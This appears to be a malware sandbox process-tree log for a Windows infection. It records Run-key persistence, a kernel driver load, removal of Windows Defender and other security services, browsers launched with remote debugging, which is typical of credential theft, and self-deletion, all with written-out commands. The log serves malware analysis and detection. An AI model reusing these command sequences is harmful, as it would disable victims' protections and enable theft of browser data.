C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exeC:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe31⤵
- Executes dropped EXE
PID:12912 -
C:\Windows\system32\reg.exereg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javaupdater.exe"32⤵
- Modifies registry key
PID:4100
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-ItemProperty -Path \"HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\" -Name \"Java Platform SE javaupdater.exe\" -Value '\"C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe\"'"32⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:884
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10361040101\apple.exe"3⤵PID:9696
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe"4⤵PID:9848
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8C7C.tmp\8C7D.tmp\8C7E.bat C:\Users\Admin\AppData\Local\Temp\22.exe"5⤵PID:10088
-
C:\Users\Admin\AppData\Local\Temp\22.exe"C:\Users\Admin\AppData\Local\Temp\22.exe" go6⤵PID:10200
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\8CF9.tmp\8CFA.tmp\8CFB.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"7⤵PID:10292
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"8⤵
- Launches sc.exe
PID:10404
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:10436
-
-
C:\Windows\system32\timeout.exetimeout /t 18⤵
- Delays execution with timeout.exe
PID:10480
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:10544
-
-
C:\Windows\system32\sc.exesc start ddrver8⤵
- Launches sc.exe
PID:10572
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10604
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t8⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:10628
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"8⤵
- Launches sc.exe
PID:10660
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"8⤵
- Launches sc.exe
PID:10696
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f8⤵PID:10748
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"8⤵
- Launches sc.exe
PID:10784
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"8⤵
- Launches sc.exe
PID:10820
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f8⤵PID:10848
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"8⤵
- Launches sc.exe
PID:10868
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"8⤵
- Launches sc.exe
PID:10900
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f8⤵PID:10948
-
-
C:\Windows\system32\sc.exesc stop "Sense"8⤵
- Launches sc.exe
PID:10972
-
-
C:\Windows\system32\sc.exesc delete "Sense"8⤵
- Launches sc.exe
PID:11040
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f8⤵PID:11008
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"8⤵
- Launches sc.exe
PID:10984
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"8⤵
- Launches sc.exe
PID:11092
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f8⤵PID:11152
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"8⤵
- Launches sc.exe
PID:11184
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"8⤵
- Launches sc.exe
PID:11224
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f8⤵PID:764
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"8⤵
- Launches sc.exe
PID:11360
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"8⤵
- Launches sc.exe
PID:11416
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f8⤵PID:11444
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"8⤵
- Launches sc.exe
PID:11476
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"8⤵
- Launches sc.exe
PID:11528
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f8⤵PID:11592
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:11644
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"8⤵
- Launches sc.exe
PID:11680
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f8⤵PID:11704
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"8⤵
- Launches sc.exe
PID:11740
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"8⤵
- Launches sc.exe
PID:11772
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f8⤵PID:11812
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"8⤵
- Launches sc.exe
PID:11832
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"8⤵
- Launches sc.exe
PID:11864
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f8⤵PID:11892
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"8⤵
- Launches sc.exe
PID:11928
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"8⤵
- Launches sc.exe
PID:11960
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f8⤵PID:11972
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"8⤵
- Launches sc.exe
PID:12004
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"8⤵
- Launches sc.exe
PID:12044
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f8⤵PID:12060
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"8⤵
- Launches sc.exe
PID:12112
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"8⤵
- Launches sc.exe
PID:12144
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f8⤵PID:12152
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"8⤵
- Launches sc.exe
PID:12196
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"8⤵
- Launches sc.exe
PID:12228
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f8⤵PID:12244
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"8⤵
- Launches sc.exe
PID:12296
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"8⤵
- Launches sc.exe
PID:4956
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f8⤵PID:12360
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f8⤵PID:12504
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f8⤵PID:3252
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f8⤵PID:13240
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f8⤵PID:5240
-
-
C:\Windows\system32\sc.exesc stop ddrver8⤵
- Launches sc.exe
PID:5520
-
-
C:\Windows\system32\sc.exesc delete ddrver8⤵
- Launches sc.exe
PID:2064
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"C:\Users\Admin\AppData\Local\Temp\10361660101\UYpk7xI.exe"3⤵PID:6152
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"4⤵PID:6192
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:6616 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x238,0x23c,0x240,0x214,0x244,0x7ff875b4dcf8,0x7ff875b4dd04,0x7ff875b4dd106⤵PID:6348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2012,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2004 /prefetch:26⤵PID:6892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2100,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2240 /prefetch:36⤵PID:7008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2668 /prefetch:86⤵PID:5416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3228 /prefetch:16⤵
- Uses browser remote debugging
PID:1108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:16⤵
- Uses browser remote debugging
PID:2844
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4220,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4236 /prefetch:26⤵
- Uses browser remote debugging
PID:7240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4644,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3752 /prefetch:16⤵
- Uses browser remote debugging
PID:7660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5232,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5260 /prefetch:86⤵PID:8276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,15555826459458337132,17314387559607913504,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5528 /prefetch:86⤵PID:10848
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:12036 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x1ec,0x220,0x224,0x1fc,0x228,0x7ff875b4dcf8,0x7ff875b4dd04,0x7ff875b4dd106⤵PID:12128
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1980,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:36⤵PID:4012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2548,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:26⤵PID:4360
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2128,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:86⤵PID:2376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2996,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=3008 /prefetch:16⤵
- Uses browser remote debugging
PID:1104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3032,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=3044 /prefetch:16⤵
- Uses browser remote debugging
PID:5428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:26⤵
- Uses browser remote debugging
PID:10244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4612,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=4640 /prefetch:16⤵
- Uses browser remote debugging
PID:6164
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=5196 /prefetch:86⤵PID:12624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5988,i,6861341108911216938,12678819908196160363,262144 --variations-seed-version --mojo-platform-channel-handle=5996 /prefetch:86⤵PID:6576
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:9656 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x30c,0x7ff875f0f208,0x7ff875f0f214,0x7ff875f0f2206⤵PID:11356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1808,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:36⤵PID:7444
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2172,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=2160 /prefetch:26⤵PID:7192
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1960,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=2864 /prefetch:86⤵PID:11560
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3428,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:16⤵
- Uses browser remote debugging
PID:12740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:16⤵
- Uses browser remote debugging
PID:11600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5484,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=5508 /prefetch:86⤵PID:2828
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5464,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=5472 /prefetch:86⤵PID:7660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,241164077842161653,17316756474171463389,262144 --variations-seed-version --mojo-platform-channel-handle=5868 /prefetch:86⤵PID:10508
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:11080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
PID:25592 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x30c,0x7ff875f0f208,0x7ff875f0f214,0x7ff875f0f2206⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1880,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:36⤵PID:11180
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2604,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:26⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1836,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:86⤵PID:24952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3448,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:16⤵
- Uses browser remote debugging
PID:25848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3456,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:16⤵
- Uses browser remote debugging
PID:25856
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4960,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:86⤵PID:26740
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=5012 /prefetch:86⤵PID:26748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5404,i,3997271554966319625,7706134037271557132,262144 --variations-seed-version --mojo-platform-channel-handle=5416 /prefetch:86⤵PID:26996
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\zus26" & exit5⤵PID:16100
-
C:\Windows\SysWOW64\timeout.exetimeout /t 116⤵
- Delays execution with timeout.exe
PID:15768
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"C:\Users\Admin\AppData\Local\Temp\10361680101\jokererer.exe"3⤵PID:7668
-
